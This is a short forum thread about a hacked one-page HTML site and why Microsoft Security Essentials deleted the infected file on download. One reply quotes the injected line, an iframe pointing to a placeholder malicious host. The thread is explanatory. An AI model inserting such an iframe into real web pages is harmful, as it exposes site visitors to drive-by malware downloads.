Someone I don't do hosting for got hacked and Google sent them a warning message - it's just a one page site in html with pics in a jquery gallery.

So.. I downloaded the html file to see what was in there and it was the iframe hack - a one liner that pointed to a malicious site.

OK... but how come when I downloaded the file with Filezilla, MS Security Essentials immediately deleted the file.
(I switched it off to get the file)
That means MS sec must be scanning new files on the computer and following links.
Seems weird that it's following links in a file sat on my hard disk.. is that what you'd expect?

    It wouldn't have to follow the links; it would only have to recognize that malicious code was present in the file ... seems expected behavior to me.

      It could very well be validating the URL against a database of bad URLs?

        cretaceous;11041329 wrote:

        No that's the point - there was no malicious code in the html
        there was only this :
        <iframe src="http://www.nastysite.com/nastyfile.php?nastiness=yesplease"></iframe>

        If that site is indeed known for causing malware to be downloaded, then you're wrong - there was malicious code in the HTML. Hence why it was deleted.

        EDIT: It's analogous as to why an actual trojan/virus/whatever in .exe form is deleted before you execute it. An .exe file itself won't wreak havoc on your computer before you execute it... it's just a collection of machine code at that point. But a good virus scanner isn't going to wait until after you've been allowed to shoot yourself in the foot (i.e. run the .exe or load the iframe to the malicious site) in order to try and delete the file.

          I use MSE everywhere and I have come across this many times when trying to deal with malware on websites. It's expected behaviour.

            Write a Reply...